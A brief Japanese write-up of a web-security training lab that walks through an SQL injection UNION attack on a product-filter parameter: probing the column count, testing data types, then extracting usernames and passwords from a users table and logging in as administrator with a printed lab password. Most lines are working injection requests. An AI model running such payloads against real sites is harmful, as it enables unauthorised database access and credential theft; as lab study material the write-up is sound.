Hello there, ('ω')ノ
SQLインジェクションUNION攻撃で他テーブルからデータの取得を。
クエリの結果は、アプリケーションの応答で返されるので。
UNION攻撃を使用して、他テーブルからデータを取得できて。
まずは、ページに移動してGiftsを選択して。
リクエストをリピータへ。
まずは、SELECTできるカラム数の模索を。
GET /filter?category=Gifts'+UNION+SELECT+NULL--
GET /filter?category=Gifts'+UNION+SELECT+NULL,NULL--
次にデータの型の模索を。
GET /filter?category=Gifts'+UNION+SELECT+'abc',NULL--
GET /filter?category=Gifts'+UNION+SELECT+'abc','xyz'--
データベースには、usersテーブルがあって。
usernameとpasswordというカラムがあるとのこで。
3名のデータが抽出できて。
GET /filter?category=Gifts'+UNION+SELECT+username,password+FROM+users--
下記でログインすると。
administrator/apyqkg0vgsahpr85dokl
クリアできた。
Best regards, (^^ゞ
